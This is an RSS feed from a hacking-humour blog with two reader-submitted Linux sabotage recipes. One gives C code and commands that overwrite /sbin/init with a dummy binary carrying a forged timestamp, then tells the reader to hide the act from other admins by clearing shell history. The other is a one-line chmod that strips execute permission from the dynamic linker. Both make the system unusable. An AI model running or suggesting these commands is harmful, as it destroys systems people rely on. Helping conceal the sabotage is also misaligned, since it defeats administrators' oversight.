<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>Breaking Systems for Fun and Profit &#187; submitted</title>
	<atom:link href="http://breakingsystemsforfunandprofit.com/archives/tag/submitted/feed" rel="self" type="application/rss+xml" />
	<link>http://breakingsystemsforfunandprofit.com</link>
	<description>You _can_ stop the signal.</description>
	<lastBuildDate>Mon, 17 May 2010 09:58:45 +0000</lastBuildDate>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.org/?v=3.0.1</generator>
		<item>
		<title>SImplify your init</title>
		<link>http://breakingsystemsforfunandprofit.com/archives/128</link>
		<comments>http://breakingsystemsforfunandprofit.com/archives/128#comments</comments>
		<pubDate>Sun, 09 Aug 2009 08:40:11 +0000</pubDate>
		<dc:creator>Mule</dc:creator>
				<category><![CDATA[Kernel Capers]]></category>
		<category><![CDATA[init]]></category>
		<category><![CDATA[linux]]></category>
		<category><![CDATA[submitted]]></category>

		<guid isPermaLink="false">http://breakingsystemsforfunandprofit.com/?p=128</guid>
		<description><![CDATA[This one was submitted by fl0_: Create a file called init.c #include &#60;stdio.h&#62; &#160; int main&#40;&#41;&#123; &#160; printf&#40;&#34;MOEHAHAHHAAAA\n&#34;&#41;; return 0; &#125; Next run the following commands: gcc -o init init.c touch -r /sbin/init init cp -f init /sbin/init You might want to hide your handiwork from the other admins by either removing ~/.bash_history(obvious)/running set +o [...]]]></description>
			<content:encoded><![CDATA[<p>This one was submitted by <strong>fl0_</strong>:</p>
<p>Create a file called <code>init.c</code></p>

<div class="wp_syntax"><div class="code"><pre class="c" style="font-family:monospace;"><span style="color: #339933;">#include &lt;stdio.h&gt;</span>
&nbsp;
<span style="color: #993333;">int</span> main<span style="color: #009900;">&#40;</span><span style="color: #009900;">&#41;</span><span style="color: #009900;">&#123;</span>
&nbsp;
       <span style="color: #000066;">printf</span><span style="color: #009900;">&#40;</span><span style="color: #ff0000;">&quot;MOEHAHAHHAAAA<span style="color: #000099; font-weight: bold;">\n</span>&quot;</span><span style="color: #009900;">&#41;</span><span style="color: #339933;">;</span>
       <span style="color: #b1b100;">return</span> <span style="color: #0000dd;">0</span><span style="color: #339933;">;</span>
<span style="color: #009900;">&#125;</span></pre></div></div>

<p>Next run the following commands:</p>

<div class="wp_syntax"><div class="code"><pre class="bash" style="font-family:monospace;"><span style="color: #c20cb9; font-weight: bold;">gcc</span> <span style="color: #660033;">-o</span> init init.c
<span style="color: #c20cb9; font-weight: bold;">touch</span> <span style="color: #660033;">-r</span> <span style="color: #000000; font-weight: bold;">/</span>sbin<span style="color: #000000; font-weight: bold;">/</span>init init
<span style="color: #c20cb9; font-weight: bold;">cp</span> <span style="color: #660033;">-f</span> init <span style="color: #000000; font-weight: bold;">/</span>sbin<span style="color: #000000; font-weight: bold;">/</span>init</pre></div></div>

<p>You might want to hide your handiwork from the other admins by either removing <code>~/.bash_history</code>(obvious)/running <code>set +o history</code> before you begin/<code>kill -9 $$</code></p>
]]></content:encoded>
			<wfw:commentRss>http://breakingsystemsforfunandprofit.com/archives/128/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Better get some rescue cd&#8217;s&#8230;</title>
		<link>http://breakingsystemsforfunandprofit.com/archives/75</link>
		<comments>http://breakingsystemsforfunandprofit.com/archives/75#comments</comments>
		<pubDate>Fri, 24 Jul 2009 10:06:09 +0000</pubDate>
		<dc:creator>Mule</dc:creator>
				<category><![CDATA[Bash Bonanza]]></category>
		<category><![CDATA[linux]]></category>
		<category><![CDATA[submitted]]></category>

		<guid isPermaLink="false">http://breakingsystemsforfunandprofit.com/?p=75</guid>
		<description><![CDATA[This one was submitted by giulivo using the submission link: chmod a-x /lib/ld-2*.so]]></description>
			<content:encoded><![CDATA[<p>This one was submitted by <a href="http://giulivo.blogspot.com">giulivo</a> using the <a href="http://breakingsystemsforfunandprofit.com/submissions">submission</a> link:</p>

<div class="wp_syntax"><div class="code"><pre class="bash" style="font-family:monospace;"><span style="color: #c20cb9; font-weight: bold;">chmod</span> a-x <span style="color: #000000; font-weight: bold;">/</span>lib<span style="color: #000000; font-weight: bold;">/</span>ld-<span style="color: #000000;">2</span><span style="color: #000000; font-weight: bold;">*</span>.so</pre></div></div>

]]></content:encoded>
			<wfw:commentRss>http://breakingsystemsforfunandprofit.com/archives/75/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
	</channel>
</rss>
